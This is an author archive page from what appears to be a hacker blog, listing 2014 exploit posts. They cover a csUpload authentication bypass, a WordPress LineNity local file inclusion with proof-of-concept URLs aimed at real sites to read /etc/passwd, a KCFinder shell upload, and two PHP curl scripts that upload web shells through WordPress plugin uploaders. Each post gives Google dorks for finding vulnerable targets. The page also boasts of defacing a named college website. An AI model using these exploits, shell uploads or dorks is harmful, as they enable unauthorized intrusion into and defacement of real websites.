1337mir

About 1337mir

This author has not yet filled in any details.
So far 1337mir has created 49 entries.

csUpload Script Site Authentication Bypass

By |April 15th, 2014|

Exploit Title: csUpload Script Site Authentication Bypass
Google Dork: CSUpload.cgi?command=
Date: 4/9/2014
Exploit Author: Satanic2000
Vendor Homepage: http://www.cgiscript.net
Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
Tested on: linux
vuln: Site.com/[path]/CSUpload/CSUpload.cgi
[path] : /cgi-script/ or /cgi-bin/ or None
Example:
1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi

3- Select Database Select Databases And Upload (File,Or Shell)
Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend

Comments Off on csUpload Script Site Authentication Bypass

WordPress Theme LineNity LFI Vulnerability

By |April 15th, 2014|

exploit title: Local File Inclusion in WordPress Theme LineNity
Date: 13/04/2014
Google Dorks: inurl:wp-content/themes/linenity/
Risk: High
Author: Felipe Andrian Peixoto
Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
Contact: [email protected]
Tested on: Windows 7 and Linux
Vulnerable File: download.php
Exploit :
http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ]
PoC:
http://www.moXm-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php

http://sporX.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../..
/etc/passwd
http://lokXetpln.us.st//wp-content/themes/linenity/functions/download.php?imgurl=download.php

Comments Off on WordPress Theme LineNity LFI Vulnerability

Everything you need to know about the Heartbleed SSL bug

By |April 12th, 2014|

Massive. Huge. Catastrophic. These are all headlines I’ve seen today that basically say we’re now well and truly screwed when it comes to security on the internet. Specifically though, it’s this:
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.
Every […]

Comments Off on Everything you need to know about the Heartbleed SSL bug

KCFinder 2.53 Shell Upload vulnerability

By |April 2nd, 2014|

Exploit Title : KCFinder Upload Shell Vulnerability
Date : 24/04/2014
Google Dork : inurl:/kcfinder/browse.php
Exploit Author : Iranian_Dark_Coders_Team
Home : http://www.idc-team.net
Discovered By : Black.Hack3r
Vendor Homepage : http://kcfinder.sunhater.com/
Version : 2.51 – 2.53
Tested on : Windows 8 & Linux

Events location bug:
http://[localhost]/[path]/kcfinder/config.php
Line 51: ‘deniedExts’ => “exe com msi bat php phps phtml php3 php4 cgi pl”,

Exploit:
http://[localhost]/kcfinder/browse.php
http://[localhost]/[path]/kcfinder/browse.php
Proof:

STEP 1: Go to target link
http://localhost/KCFinder/browse.php

STEP […]

Comments Off on KCFinder 2.53 Shell Upload vulnerability

WP Barclaycart Plugins Arbitrary File Upload Vulnerability

By |March 18th, 2014|

exploit title: WP Barclaycart Plugins Arbitrary File Upload Vulnerability
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/barclaycart”

Vulnerable location:

wp-content/plugins/barclaycart/uploadify/uploadify.php

Exploit :

< -?- php $uploadfile="Sh1Ne.php"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/barclaycart/uploadify/’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
– ? ->

Shell Access :

http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php
or
http://localhost/wp-content/uploads/[years]/[month]/

Comments Off on WP Barclaycart Plugins Arbitrary File Upload Vulnerability

WP Plugins Premium Gallery Manager Arbitrary File Upload

By |March 18th, 2014|

exploit title: WP Plugins Premium Gallery Manager Arbitrary File Upload
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/Premium_Gallery_Manager”

Vulnerable path:
site.com/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php

Exploit:

< -?- php $uploadfile="Sh1Ne.php.jpg"; $ch= curl_init("http://127.0.0.1:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php"); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/Premium_Gallery_Manager/uploadify/’));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$postResult=curl_exec($ch);
curl_close($ch);
print”$postResult”;
? >

ShellAccess:

http://localhost:8080/wp-content/plugins/Premium_Gallery_Manager/uploadify/Sh1Ne.php.jpg
or
http://localhost:8080/wp-content/uploads/[years]/[month]/

Comments Off on WP Plugins Premium Gallery Manager Arbitrary File Upload

Metropolitan College of NewYork website penetrate

By |March 13th, 2014|

Metropolitan College of NewYork website penetration testing by 1337mir

website: http://www.mcny.edu/
ip: 216.70.80.92
defaced page: http://www.mcny.edu/1337mir.html
zone-h mirror: http://zone-h.net/mirror/id/22004967

 

Screenshot:

Comments Off on Metropolitan College of NewYork website penetrate